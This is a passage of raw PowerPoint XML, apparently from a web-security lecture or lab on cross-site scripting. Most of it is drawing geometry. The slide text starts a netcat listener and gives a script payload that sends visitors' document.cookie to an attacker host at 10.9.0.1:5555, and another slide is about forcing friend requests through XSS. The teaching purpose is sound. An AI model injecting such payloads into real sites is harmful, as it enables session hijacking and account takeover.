                  <a:pt x="3929532" y="198828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3925109" y="159591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3918567" y="133141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3910583" y="123443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20574" y="123443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12590" y="113746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6048" y="87296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1625" y="48059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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE55666D-731F-19C4-D3F1-C0288959FCF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2540" y="717550"/>
            <a:ext cx="12242165" cy="456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974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We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inject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script that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send</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> 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cookies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whoever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visiting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page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TCP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server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>we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"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="495300" indent="-2546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95934" algn="l"/>
              </a:tabLst>
            </a:pP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separate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terminal,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start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netcat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server!</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial MT"/>
              <a:cs typeface="Arial MT"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="622300">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="565"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nc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–lknv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5555</a:t>
            </a:r>
            <a:endParaRPr sz="24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055"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>you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5"/>
              </a:rPr>
              <a:t>https://webhook.site/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> 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which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gives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you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termporary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URL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listen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561975" indent="-254635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1614"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
              <a:tabLst>
                <a:tab pos="562610" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>Inject malicious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script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website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600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;document.write('&lt;img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src=http://10.9.0.1:5555?c='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+</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="4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escape(document.cookie)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="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+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'&gt;');&lt;/script&gt;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Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="909319">
              <a:lnSpc>
                <a:spcPts val="1995"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>We </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>create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“trap”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bogus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image.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when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someone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else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tries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load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issues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10.9.0.1:5555</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="542290" indent="-255270">
              <a:lnSpc>
                <a:spcPts val="1995"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
              <a:tabLst>
                <a:tab pos="542925" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Profit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13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79906DA8-80CB-D1AF-E727-B743BB6FBCA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4979670" y="909066"/>
            <a:ext cx="5408930" cy="3096895"/>
            <a:chOff x="4979670" y="909066"/>
            <a:chExt cx="5408930" cy="3096895"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="object 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE050D8C-4543-BD04-B8DB-F871144BB97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36820" y="966216"/>
              <a:ext cx="5294376" cy="2982468"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="object 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC3C50E2-08F3-3D59-4039-AAE9E6EF41A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5008245" y="937641"/>
              <a:ext cx="5351780" cy="3039745"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5351780" h="3039745">
                  <a:moveTo>
                    <a:pt x="0" y="3039618"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5351526" y="3039618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5351526" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3039618"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="5715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0725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EC079F7B-43D6-9CE1-AFA1-13CFF64567BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect r="1504" b="2141"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="774191"/>
            <a:ext cx="9982200" cy="5195964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4A17604D-C242-8E97-A25F-CC2B4F5E14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6334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Becoming</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="20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Victim’s</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>friend</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>through XSS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2C252432-5BCD-8C46-08EB-3A29BC1032E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5267187" y="1408831"/>
            <a:ext cx="418782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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Adding a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friend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issues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an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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="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request)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11" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FE7FF17-481D-DC84-8C34-4C5495E834BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6477761" y="1690255"/>
            <a:ext cx="5104765" cy="4279900"/>
            <a:chOff x="6477761" y="1690255"/>
            <a:chExt cx="5104765" cy="4279900"/>
          </a:xfrm>
        </p:grpSpPr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8AC86FA2-F116-8580-3B52-4536365DCBEA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6477761" y="1690255"/>
              <a:ext cx="266700" cy="4279900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="99823" y="4229100"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57149" y="4229100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82168" y="4267200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85470" y="4279900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130556" y="4279900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132080" y="4267200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135001" y="4267200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135128" y="4254500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88264" y="4254500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88518" y="4241800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94503" y="4241800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99823" y="4229100"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="89408" y="4241800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88518" y="4241800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88264" y="4254500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89408" y="4241800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="134604" y="4241800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="89408" y="4241800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88264" y="4254500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135509" y="4254500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134604" y="4241800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="57149" y="4229100"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="55371" y="4229100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57785" y="4241800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57149" y="4229100"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="88518" y="4191000"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="29337" y="4191000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35687" y="4203700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36448" y="4216400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44322" y="4216400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46101" y="4229100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99823" y="4229100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94503" y="4241800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123062" y="4241800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98043" y="4203700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90678" y="4203700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88518" y="4191000"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="127079" y="4229100"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="114723" y="4229100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123062" y="4241800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131699" y="4241800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127079" y="4229100"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="29337" y="4191000"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="27686" y="4191000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30353" y="4203700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29337" y="4191000"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="20700" y="4178300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="18034" y="4178300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21336" y="4191000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20700" y="4178300"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="53593" y="4178300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20700" y="4178300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23749" y="4191000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61340" y="4191000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53593" y="4178300"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="73787" y="4178300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="53593" y="4178300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61340" y="4191000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79883" y="4191000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73787" y="4178300"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="215137" y="4178300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73787" y="4178300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79883" y="4191000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212852" y="4191000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215137" y="4178300"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="10795" y="4165600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10413" y="4165600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10540" y="4178300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12318" y="4178300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10795" y="4165600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="70231" y="4165600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10795" y="4165600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12318" y="4178300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72770" y="4178300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70231" y="4165600"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="236219" y="4140200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="184022" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188721" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62611" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66802" y="4165600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70231" y="4165600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72770" y="4178300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220598" y="4178300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236219" y="4140200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="6096" y="4152900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1650" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032" y="4165600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7112" y="4165600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6096" y="4152900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="46862" y="4152900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6096" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7112" y="4165600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45719" y="4165600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46862" y="4152900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="47497" y="4152900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="46862" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45719" y="4165600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46101" y="4165600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47497" y="4152900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="62611" y="4152900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47497" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46101" y="4165600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66802" y="4165600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62611" y="4152900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="5207" y="4140200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5079" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5207" y="4140200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="49276" y="4140200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5207" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5079" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49403" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49276" y="4140200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="56134" y="4140200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="49276" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49403" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50418" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56134" y="4140200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="59055" y="4140200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="56134" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50418" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52832" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59055" y="4140200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="180593" y="4140200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="59055" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52832" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175387" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180593" y="4140200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="191008" y="4114800"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="175387" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188721" y="4152900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184022" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236982" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242062" y="4127500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190245" y="4127500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191008" y="4114800"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="7492" y="4127500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3683" y="4127500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7112" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7492" y="4127500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="34416" y="4127500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7492" y="4127500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7112" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42037" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41491" y="4132413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34416" y="4127500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="41491" y="4132413"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="42037" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41886" y="4132687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41491" y="4132413"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="41886" y="4132687"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="42037" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42671" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42159" y="4132876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41886" y="4132687"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="42159" y="4132876"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="42671" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52705" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42159" y="4132876"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="47243" y="4076700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="41402" y="4076700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23313" y="4111264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22605" y="4114800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18287" y="4114800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12064" y="4127500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41783" y="4127500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42159" y="4132876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52705" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62737" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82804" y="4102100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34543" y="4102100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41656" y="4089400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44704" y="4089400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47243" y="4076700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="89281" y="4102100"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="82804" y="4102100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62737" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68071" y="4140200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70104" y="4127500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78993" y="4127500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80137" y="4114800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86867" y="4114800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89281" y="4102100"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="41783" y="4127500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="41886" y="4132687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42159" y="4132876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41783" y="4127500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
                  <a:moveTo>
                    <a:pt x="41783" y="4127500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="41147" y="4127500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41491" y="4132413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41886" y="4132687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41783" y="4127500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="266700" h="4279900">
